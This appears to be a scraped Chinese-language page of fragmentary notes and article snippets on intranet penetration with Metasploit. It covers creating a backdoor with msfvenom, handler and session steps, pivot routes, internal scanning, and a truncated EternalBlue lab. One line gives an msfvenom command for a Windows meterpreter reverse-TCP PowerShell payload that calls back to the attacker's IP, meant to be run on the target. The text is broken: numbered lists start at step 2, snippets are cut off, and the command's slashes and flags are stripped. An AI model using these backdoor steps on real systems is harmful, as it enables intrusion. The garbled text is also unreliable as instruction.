msf路徑 /usr/share
製作後門 msfvenom
windows示例
遠控流程
2.開啟msf並進入handle模組
3.設定payload型別(必須與第一步一致)
4.設定lhost和lport(與第一步生成的後門一致)
5.options檢視配置是否正確
6.run執行
bg將程序放到後台,sessions檢視,sessions 程序id 返回到程序
新增內網路由
(被控制的目標機只能訪問外網不能訪問內網,給它新增路由以訪問內網)
內網掃瞄
2.設定主機段
3.設定掃瞄埠
4.設定執行緒
5.run 執行指令碼
back 退出當前模組
埠**常用命令
run檔案操作
網路命令
系統命令
使用者介面命令
其他程序注入
msf反彈shell內網滲透
1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...
內網滲透之msf工具詳解
一.檔案目錄 date目錄 儲存資料 documentation目錄 文件目錄 lib目錄 儲存ruby指令碼 modules目錄 儲存模組和外掛程式 tools目錄 儲存小工具 二.基礎使用 msfdb init 初始化並啟動資料庫 db status 檢視資料庫狀態 msfconsole 控制台...
內網滲透(msf 永恆之藍漏洞)
準備工具 一台kall虛擬機器 擁有msf 一台win7虛擬機器 先使用msf的永恆之藍掃瞄模組對區域網進行掃瞄,可以掃瞄出區域網內符合條件的計算機資訊。這裡先推薦用nmap掃瞄區域網的存活機後,直接指定ip掃瞄把,用這個模板直接掃瞄整個區域網實在是太浪費時間了。在掃瞄出有著永恆之藍漏洞的計算機後,...